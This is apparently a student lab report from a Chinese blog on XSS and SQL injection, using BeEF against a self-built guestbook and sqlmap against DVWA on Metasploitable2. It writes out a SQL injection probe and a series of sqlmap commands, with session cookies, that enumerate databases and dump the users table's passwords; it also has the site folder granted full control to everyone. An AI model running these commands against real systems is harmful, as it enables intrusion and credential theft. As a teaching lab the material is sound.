实验三 XSS和SQL注入

最新推荐文章于 2023-12-27 22:46:10 发布
最新推荐文章于 2023-12-27 22:46:10 发布
阅读量191 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48647514/article/details/110873608
版权

实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。

系统环境:Kali Linux 2、Windows Server

网络环境:交换网络结构

实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA

实验步骤:

XSS部分:利用Beef劫持被攻击者客户端浏览器。

实验环境搭建

角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建)
攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站)
被攻击者:访问留言簿网站,浏览器被劫持。

参考

https://blog.csdn.net/u011781521/article/details/53914335

注意!一定要把搭建的网站的权限打开,否则将无法留言
在这里插入图片描述

点击添加在这里插入图片描述

输入everyone在这里插入图片描述
完全控制一栏勾选允许在这里插入图片描述

在这里插入图片描述
搭建完成

1、利用AWVS扫描留言簿网站,发现其存在XSS漏洞,截图。

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

2、 Kali使用beef生成恶意代码,截图。

在这里插入图片描述

3、访问http://留言簿网站/message.asp;将以下恶意代码写入网站留言板, ,截图。

在这里插入图片描述

4、管理员登录login.htm,账号密码均为admin,审核用户留言。只要客户端访问这个服务器的留言板,客户端浏览器就会被劫持,指定被劫持网站为学校主页,将你在beff中的配置截图。

在这里插入图片描述
将劫持的网站改为学校主页
在这里插入图片描述
再进入留言网站,发现跳转到了学校主页!
在这里插入图片描述

5、回答问题:实验中XSS攻击属于哪种类型?

本次实验中的XSS攻击属于注入型XSS攻击

SQL注入部分:DVWA+SQLmap+Mysql注入实战

实验环境搭建。启动Metasploitable2虚拟机。

1、注入点发现。

首先肯定是要判断是否有注入漏洞。 在输入框输入1,返回
ID: 1
First name: admin
Surname: admin

在这里插入图片描述
再次输入1’,报错,返回
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘‘1’’’ at line 1

在这里插入图片描述
此时可以断定有SQL注入漏洞
获取cookie:
开启Firefox浏览器TamperData插件,等待获取cookies值,在SQL Injection输入1,即可获取cookie
在这里插入图片描述
在这里插入图片描述

cookie值:

security=low;PHPSESSID=438c6341d84f86576782371e85b0bc03

2、枚举当前使用的数据库名称和用户名。

命令:

sqlmap -u “http://Metasplotiable 2的IP/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=‘security=low;PHPSESSID=a00cdd0edd625af6fc0a6f27c8952be3’ -b --current-db --current-user

在这里插入图片描述

3.枚举数据库用户名和密码

命令:

sqlmap -u “http://Metasplotiable 2的IP/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=‘security=low;PHPSESSID=a00cdd0edd625af6fc0a6f27c8952be3’ --users --password

在这里插入图片描述
在这里插入图片描述

4.枚举数据库

命令:

sqlmap -u "Metasplotiable 2的IP/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=‘security=low; PHPSESSID=a00cdd0edd625af6fc0a6f27c8952be3’ --dbs

在这里插入图片描述
在这里插入图片描述

5、枚举数据库和指定数据库的数据表

命令:

sqlmap -u “Metasplotiable 2的IP/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=‘security=low;PHPSESSID=a00cdd0edd625af6fc0a6f27c8952be3’ -D dvwa --tables

在这里插入图片描述

6、获取指定数据库和表中所有列的信息

命令:

sqlmap -u “http://Metasplotiable 2的IP/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=‘security=low;PHPSESSID=a00cdd0edd625af6fc0a6f27c8952be3’ --string=“Surname” -D dvwa -T users --columns

在这里插入图片描述

7、枚举指定数据表中的所有用户名与密码,并down到本地。

命令:

sqlmap -u “http://125.217.53.8/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=‘security=low;PHPSESSID=a00cdd0edd625af6fc0a6f27c8952be3’ -D dvwa -T users -C user,password --dump

在这里插入图片描述

花有重开日_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XSSSQL注入
LJW_wenjingli7的博客
01-22 392
答:XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。通过实验我了解到xsssql注入的概念和基本实践,做这个实验也遇到了很多困难,比如建立网站如何设置,排除输入的问题,beef恶意代码的逆向攻击等都考验我的实际操作,好几串sql注入语句也是让我困惑,难以理解,尝试多了,到最后套用现成语句居然得心应手了。了解XSS攻击实施,理解防御XSS攻击的方法;设置密码后自动跳转beef网站,账号是beef,密码是刚刚设置的密码。
实验二、XSSSQL注入
weixin_30525825的博客
05-21 562
一、 实验目的 了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。 二、 系统环境:Kali Linux2、Windows 三、 网络环境:交换网络结构 四、 实验工具:AWVS(Acunetix Web Vulnar...
xss sql注入
qq_62046696的博客
04-20 498
xss分为 反射型(大部分钓鱼), 存储型(guest book 提交,look message 查看<img>被解析 ,DOM型。 select 1,2 union 2,4 前后要一致 select * from guestbook order by 1 查看有几类字段 然后用联合查询 渲染位,select * from sqlunion where id=9999 union select 1,2 前面没有值后面会进行顶替 database()当前的数据库名 sleep(5)查询
xsssql注入
Coisini的博客
05-22 967
在这篇文章中我将说明所有关于XSS以及更多相关的知识.通过这篇文档,我希望能让你明白什么是XSS,为什么使用XSS,以及怎样使用XSS.一旦你学会了,你将需要发挥自己的创造力,因为大多数人都修补了简单的XSS漏洞.但是他们所忘记做的是修补比XSS的一个字符串更多的漏洞,并且php中特殊安全机制被用来防御XSS,而取代他们自己的方法.同时我将阐述的不仅仅是XSS,而是所有的web安全. XXXXXX...
网络渗透实验三XSSSQL注入
liangtaiwei的博客
12-13 639
1.实验目的 了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。 系统环境:Kali Linux 2、WindowsServer 网络环境:交换网络结构 实验工具:Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA 2.实验内容、原理 XSS部分:利用Beef劫持被攻击者客户端浏览器..
【实验报告】实验三 XSSSQL注入
m0_52108440的博客
12-13 1754
实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。 系统环境:Kali Linux 2、Windows Server 网络环境:交换网络结构 实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA 实验步骤: XSS部分:利用Beef劫持被攻击者客户端浏览器。 实验环境搭建。.
网络渗透测试实验三 XSSSQL注入
qq_50798384的博客
12-14 678
实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。 系统环境:Kali Linux 2、Windows Server 网络环境:交换网络结构 实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA 实验步骤: XSS部分:利用Beef劫持被攻击者客户端浏览器。 实验环境搭建。 角色
XSSSQL注入
qq_51297226的博客
12-15 394
一、 XSS跨站脚本注入实验 实验环境搭建。 角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建) 攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站); 被攻击者:访问留言簿网站,浏览器被劫持。 网站搭建好后就开始用AWVS扫描该网页是否存在XSS漏洞 1、利用AWVS扫描留言簿网站发现其存在XSS漏洞, 2、 Kali使用beef生成恶意代码 在这里使用beef工具时出现了错误,不能使用默认的账号和密码,文件中添加一个账号即可 1 将它写到留言板
xss攻击 SQL注入
qq_65208982的博客
06-10 1327
QL注入,是发生于应用程序与数据库层的安全漏洞。简而言之,是在输入的字符串之中注入SQL指令,在设计不良的程序当中忽略了字符检查,那么这些注入进去的恶意指令就会被数据库服务器误认为是正常的SQL指令而运行,因此遭到破坏或是入侵。SQL 注入一般发生在用户交互场景中,比如需要用户自已输入信息的输入框,或者下拉选择选项的这种,如果不做好输入内容的过滤,就很可能发生 SQL 注入。
网络渗透实验三XSSSQL注入
最新发布
dalungame的博客
12-27 906
反射型 XSS 一般是攻击者通过特定手法(如电子邮件),诱使用户去访问一个包含恶意代码的 URL,当受害者点击这些专门设计的链接的时候,恶意代码会直接在受害者主机上的浏览器执行。了解XSS攻击实施,理解防御XSS攻击的方法;只要客户端访问这个服务器的留言板,客户端浏览器就会被劫持,指定被劫持网站为学校主页,将你在beff中的配置截图。(提示带.的文件夹为隐藏,在图形命令下,用文件浏览器打开文件夹,按下ctrl+h组合键可显示隐藏文件合文件夹,再按一次取消显示。被攻击者:访问留言簿网站,浏览器被劫持。
实验三XSSSQL注入
yghlqgt的博客
11-27 754
试验前需要掌握的知识 下面内容是试验前你需要了解并掌握的知识,详细的内容可以移步到这篇博客中去学习:试验前的知识储备 XSS部分 1、什么是XSS 2 、什么是XSS攻击 3、 什么是Cookie 4、XSS漏洞的分类 5、XSS的防御 SQL注入部分 1、什么是SQL注入攻击 2、为何会有SQL注入攻击 3. 何时使用SQL注入攻击 4、MySQL简介 5、实施SQL注入攻击 6、防范SQL注入方法汇总 实验部分 实验目的: 了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入
经典:Web安全之XSSSQL注入
jklbnm12的博客
06-24 639
一、前言 近几年,伴随互联网的高速发展,对Web安全问题的重视也越来越高。Web应用所面临的威胁来自很多方面,其中黑客的破坏是影响最大的,黑客利用Web应用程序存在的漏洞进行非法入侵,从而破坏Web应用服务,盗取用户数据等,如何防范漏洞带来的安全威胁是一项艰巨的挑战。 为了增强用户的交互体验,开发者们在Web应用程序中大量应用客户端脚本,使Web应用的内容与功能变得丰富有趣,然而隐藏的安全威胁随之而来,黑客们将Web攻击的思路从服务器端转向了客户端,利用客户端脚本漏洞的攻击变得越来越强大,如跨站脚本
Web攻击手段之XSS攻击,CRSF, SQL注入攻击
chenglinhust的专栏
06-05 2882
Web攻击手段之XSS攻击,CRSF, SQL注入攻击       1.  XSS攻击        XSS攻击的全称是跨站脚本攻击,指的是攻击者在网页中嵌入恶意脚本程序,当用户打开该网页时,脚本程序便开始在客户端的浏览器上执行,以盗取客户端cookie,用户名密码,下载执行病毒密码程序,甚至是获取客户端admin权限等。              2.  CRSF攻击    
网络渗透测试实验:XSS攻击和SQL注入防御
本实验旨在让学生了解网络渗透的基本概念和技术,包括XSS攻击和SQL注入攻击的原理、防御方法和实践操作。实验环境使用Kali Linux 2和Windows Server,网络环境采用交换网络结构,实验工具包括Beef、AWVS、SqlMAP和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值